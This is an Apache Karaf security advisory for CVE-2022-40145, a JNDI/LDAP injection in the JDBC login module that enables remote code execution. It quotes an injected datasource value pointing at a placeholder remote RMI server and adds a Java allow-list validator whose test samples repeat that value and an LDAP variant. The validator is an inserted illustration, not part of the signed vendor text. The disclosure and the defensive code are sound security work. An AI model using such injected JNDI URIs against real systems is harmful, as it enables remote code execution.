-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
CVE-2022-40145: LDAP injection vulnerability in JDBC Login Module with JDK 8
Severity: Low
Vendor: The Apache Software Foundation
Versions Affected: all versions of Apache Karaf prior to 4.3.8 or 4.4.2
Description:
The method org.apache.karaf.jaas.modules.jdbc.JDBCUtils#doCreateDatasource
passes the configured name to InitialContext.lookup(jndiName) without filtering.
A user can change `options.put(JDBCUtils.DATASOURCE, "osgi:" +
DataSource.class.getName());` to `options.put(JDBCUtils.DATASOURCE,
"jndi:rmi://x.x.x.x:xxxx/Command");` (as in JdbcLoginModuleTest#setup).
This is vulnerable to remote code execution (RCE) when a configuration
uses a JNDI LDAP data source URI and an attacker controls the target
LDAP server.
This has been fixed in the following revisions:
https://gitbox.apache.org/repos/asf?p=karaf.git;h=3819f48341
https://gitbox.apache.org/repos/asf?p=karaf.git;h=2a933445d1
Mitigation: Apache Karaf users should upgrade to 4.3.8 or 4.4.2
or later as soon as possible, or make sure the JDBCUtils.DATASOURCE option
refers to a correct, locally resolved path (such as the `osgi:` form above)
rather than a JNDI URI pointing at an external server.
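As an added illustration (not Karaf's own fix and not code from this advisory), the check below validates the JDBCUtils.DATASOURCE value before anything is handed to InitialContext.lookup(): `osgi:` lookups and in-process JNDI names pass, while a `jndi:` value whose URI names a remote server (`rmi://`, `ldap://`) is refused. The class name, the `isAllowed` method and the set of "local" JNDI schemes are assumptions.

```java
import java.util.Arrays;
import java.util.List;
import java.util.Locale;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
// Hypothetical allow-list for the JAAS "datasource" option, not Karaf's real fix:
// a "jndi:" value is validated before it reaches InitialContext.lookup(), so a
// URI naming a remote LDAP/RMI server is refused rather than dereferenced.
public final class DataSourceOptionCheck {
    static final String OSGI = "osgi:";
    static final String JNDI = "jndi:";
    // Leading URI scheme such as "ldap:", "rmi:" or "java:" (RFC 3986 syntax).
    private static final Pattern SCHEME = Pattern.compile("^([A-Za-z][A-Za-z0-9+.-]*):");
    // JNDI schemes resolved inside the JVM (assumption); anything else is treated as remote.
    private static final List<String> LOCAL_SCHEMES = Arrays.asList("java", "osgi");
    /** True if the option may be handed to the datasource lookup. */
    public static boolean isAllowed(String option) {
        if (option == null) return false;
        String value = option.trim();
        if (value.startsWith(OSGI)) {
            return true;                    // OSGi service lookup, resolved locally
        }
        if (!value.startsWith(JNDI)) {
            return false;                   // unknown prefix: fail closed
        }
        String jndiName = value.substring(JNDI.length());
        if (jndiName.contains("//")) {
            return false;                   // authority part => names a remote server
        }
        Matcher m = SCHEME.matcher(jndiName);
        if (!m.find()) {
            return true;                    // plain name like "jdbc/karaf": container lookup
        }
        return LOCAL_SCHEMES.contains(m.group(1).toLowerCase(Locale.ROOT));
    }
    public static void main(String[] args) {
        // Constructed samples; the first two mirror the advisory's own values.
        String[] samples = {
            OSGI + "javax.sql.DataSource",        // allow
            "jndi:rmi://x.x.x.x:xxxx/Command",     // reject: remote RMI registry
            "jndi:ldap://x.x.x.x:xxxx/Command",    // reject: remote LDAP server
            "jndi:jdbc/karaf",                      // allow: local JNDI name
            "jndi:java:comp/env/jdbc/karaf",        // allow: container-bound name
        };
        for (String s : samples) {
            System.out.println((isAllowed(s) ? "allow  " : "reject ") + s);
        }
    }
}
```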
JIRA Tickets: https://issues.apache.org/jira/browse/KARAF-7568
Credit: This issue was discovered and reported by Xun Bai <bbbbear68@gmail.com>